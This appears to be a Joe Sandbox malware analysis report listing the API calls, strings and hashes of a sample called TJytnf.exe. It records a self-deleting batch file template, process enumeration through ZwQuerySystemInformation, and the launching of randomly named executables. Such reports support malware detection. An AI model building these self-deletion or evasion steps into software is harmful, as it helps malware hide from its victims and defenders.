                            • Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71894
                          • wsprintfA.USER32 ref: 00F715AA
                          • wsprintfA.USER32 ref: 00F715C6
                          • lstrlen.KERNEL32(?), ref: 00F715D2
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00F715EE
                          • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00F71609
                          • CloseHandle.KERNEL32(00000000), ref: 00F71612
                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F7162D
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                          • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$open
                          • API String ID: 617340118-1710932710
                          • Opcode ID: 9e80467f80d44918437ca208b44d5f8a4eca2c917899a4d6f56acdedae1a0572
                          • Instruction ID: 84422179cab4ef1a4e0b088fa0038ee49d95fd0f26cdc28d6d6b15f9f5e5ff48
                          • Opcode Fuzzy Hash: 9e80467f80d44918437ca208b44d5f8a4eca2c917899a4d6f56acdedae1a0572
                          • Instruction Fuzzy Hash: 0B115472A0112CBAD72097A49C89DEB7B6CEF59764F400052F54DE2040DA749BC8ABB3
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00F71400), ref: 00F71226
                          • GetProcAddress.KERNEL32(00000000), ref: 00F7122D
                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00F71400), ref: 00F7123F
                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00F71400), ref: 00F71250
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00F71400), ref: 00F7129E
                          • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00F71400), ref: 00F712B0
                          • CloseHandle.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00F71400), ref: 00F712F5
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00F71400), ref: 00F7130A
                          Strings
                          • ntdll.dll, xrefs: 00F71219
                          • C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F71262
                          • ZwQuerySystemInformation, xrefs: 00F71212
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                          • String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$ZwQuerySystemInformation$ntdll.dll
                          • API String ID: 1500695312-755741500
                          • Opcode ID: c984c7ff96a1958d6d50b74c6d94634f8bc63a62091fa11b82ec1bc218e0694b
                          • Instruction ID: 12a306e358085ea61a04b668601266a3b20357da50ec4f79ec8eb44da977bcb8
                          • Opcode Fuzzy Hash: c984c7ff96a1958d6d50b74c6d94634f8bc63a62091fa11b82ec1bc218e0694b
                          • Instruction Fuzzy Hash: 60212731B04311BBD7209F58DC08B6BBAA8FB45B10F10491AF54DD6241C370D988F7A7
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,771AE800,?,?,00F729DB,?,00000001), ref: 00F726A7
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,771AE800,?,?,00F729DB,?,00000001), ref: 00F726B5
                          • lstrlen.KERNEL32(?), ref: 00F726C4
                          • ??2@YAPAXI@Z.MSVCRT ref: 00F726CE
                          • lstrcpy.KERNEL32(00000004,?), ref: 00F726E3
                          • lstrcpy.KERNEL32(?,00000004), ref: 00F7271F
                          • ??3@YAXPAX@Z.MSVCRT ref: 00F7272D
                          • SetEvent.KERNEL32 ref: 00F7273C
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                          • String ID:
                          • API String ID: 41106472-0
                          • Opcode ID: 5d15bbd30a47c6d17800168533ee239e179db2e0dc465f54d492261b867efbf5
                          • Instruction ID: 4ad4e372e5b68931af811a4e6266c2607be618843bc6583e8c633331fff85839
                          • Opcode Fuzzy Hash: 5d15bbd30a47c6d17800168533ee239e179db2e0dc465f54d492261b867efbf5
                          • Instruction Fuzzy Hash: 97117936940208AFCB719F18ED4885A7BA9FB84731711802AF89C87120D730ADC6FB62
                          APIs
                          Strings
                          • ZuotMwaOQaRPomfbNzfpNJexRkbpUuCCMhVEyqeLeVEUsBvdXcSDMnLtFAZOxGKpvngzrIiHDixYWsluZoNahqAKryPYItXBTJHcrDjWmkqijdKIOSyPHBWUgGQnGfATlVFYzQhlgTbcsXwCEwmFJSRdkjvL, xrefs: 00F71B8A, 00F71B9C, 00F71C15, 00F71C49
                          • .exe, xrefs: 00F71C57
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: lstrcatmemcpymemsetrandsrand
                          • String ID: .exe$ZuotMwaOQaRPomfbNzfpNJexRkbpUuCCMhVEyqeLeVEUsBvdXcSDMnLtFAZOxGKpvngzrIiHDixYWsluZoNahqAKryPYItXBTJHcrDjWmkqijdKIOSyPHBWUgGQnGfATlVFYzQhlgTbcsXwCEwmFJSRdkjvL
                          • API String ID: 122620767-2855320921
                          • Opcode ID: d451252386eaa91195f02c94bce57c5840d0ec75b25b713314f10f30d379273d
                          • Instruction ID: 72a79bca4c40967c752227a5c1a20af89d3955dfb87244b976272be4b0150967
                          • Opcode Fuzzy Hash: d451252386eaa91195f02c94bce57c5840d0ec75b25b713314f10f30d379273d
                          • Instruction Fuzzy Hash: D0210422F442906EE236133D6C41FA93A44AFE3731F1680ABF5CD1A192D2681DC9B273
                          APIs
                          • memset.MSVCRT ref: 00F718B1
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,771B0F00,75A38400), ref: 00F718D3
                          • CloseHandle.KERNEL32(00F72549), ref: 00F718E9
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00F718F0
                          • GetExitCodeProcess.KERNEL32(?,00F72549), ref: 00F71901
                          • CloseHandle.KERNEL32(?), ref: 00F7190A
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                          • String ID:
                          • API String ID: 876959470-0
                          • Opcode ID: 94c649363668452d8f365d5dd7387886f1db106bac26d831bc654f065d2b88a4
                          • Instruction ID: 890f6c18498c3cce376debe6a806459032e3e357e12a7b61821605987a3a1183
                          • Opcode Fuzzy Hash: 94c649363668452d8f365d5dd7387886f1db106bac26d831bc654f065d2b88a4
                          • Instruction Fuzzy Hash: F601717290112CBBCB216B95DC48DDF7F3DFF85734F104022FA19A51A0D6318A58EAA2
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00F71334
                          • GetProcAddress.KERNEL32(00000000), ref: 00F7133B
                          • memset.MSVCRT ref: 00F71359
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcmemset
                          • String ID: NtSystemDebugControl$ntdll.dll
                          • API String ID: 3137504439-2438149413
                          • Opcode ID: 9632fe91984205857f4499140376e76b89672ad2178af5ef7bbcd9a0291e2b0a
                          • Instruction ID: 9afdd32acb5a5eca3b21d2c5a42e43061cbacc40304ede38f619a4ec655f39fc
                          • Opcode Fuzzy Hash: 9632fe91984205857f4499140376e76b89672ad2178af5ef7bbcd9a0291e2b0a
                          • Instruction Fuzzy Hash: 21016171A0030DFFDB50DF98AC8596FBBB9FB55728F00812BF909A1140D3709659EA53
                          APIs
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: strrchr$lstrcmpilstrcpylstrlen
                          • String ID:
                          • API String ID: 3636361484-0
                          • Opcode ID: c2689ab3a171b92a7ab9864e4aa940febd5bbd0ea56ed3d5ea51b1ef50d7e293
                          • Instruction ID: c492f16edd4b6491380ecc8267d540db448f08e80659d05c8af7b07b3035e2af
                          • Opcode Fuzzy Hash: c2689ab3a171b92a7ab9864e4aa940febd5bbd0ea56ed3d5ea51b1ef50d7e293
                          • Instruction Fuzzy Hash: D201A772D042197FDB105B64DC48B96779DAB05324F044066E949D2090D674AAC8AB92
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00F71F92,00000000,?,00000000,?,?,?,00F71F92,?,00000000,00000002), ref: 00F71867
                          • srand.MSVCRT ref: 00F71878
                          • rand.MSVCRT ref: 00F71880
                          • srand.MSVCRT ref: 00F71890
                          • rand.MSVCRT ref: 00F71894
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: Timerandsrand$FileSystem
                          • String ID:
                          • API String ID: 4106363736-0
                          • Opcode ID: 72a99a6754722c8c051a80fd0d2ed3df82752622f784b953ceaec13577d9fe1f
                          • Instruction ID: 04cda9da1b918de952780c6bfd3cab0b5cc097f2401472ece9119c3c3e1646c6
                          • Opcode Fuzzy Hash: 72a99a6754722c8c051a80fd0d2ed3df82752622f784b953ceaec13577d9fe1f
                          • Instruction Fuzzy Hash: 3CE0DF77A0421CBBDB00A7F9EC468DEBBACEE84165B100527F604E3250E970FD849AB4
                          APIs
                          • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00F7603C
                          • GetProcAddress.KERNEL32(00000000,00F76064), ref: 00F7604F
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true
                          • Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: kernel32.dll
                          • API String ID: 1646373207-1793498882
                          • Opcode ID: 401c2c01c8857bc5713b3a89633ce85e2c2ddb5732c8b05886939e2f99af2845
                          • Instruction ID: d83ddbcc587c80d3b445688f2e38a87ce5abfc6860829b9a916553da0efc2497
                          • Opcode Fuzzy Hash: 401c2c01c8857bc5713b3a89633ce85e2c2ddb5732c8b05886939e2f99af2845
                          • Instruction Fuzzy Hash: 58F0F6B15402898FDF70CE64CC44BDE3BE4EB05710F50846BE90DCB241CB3486059B16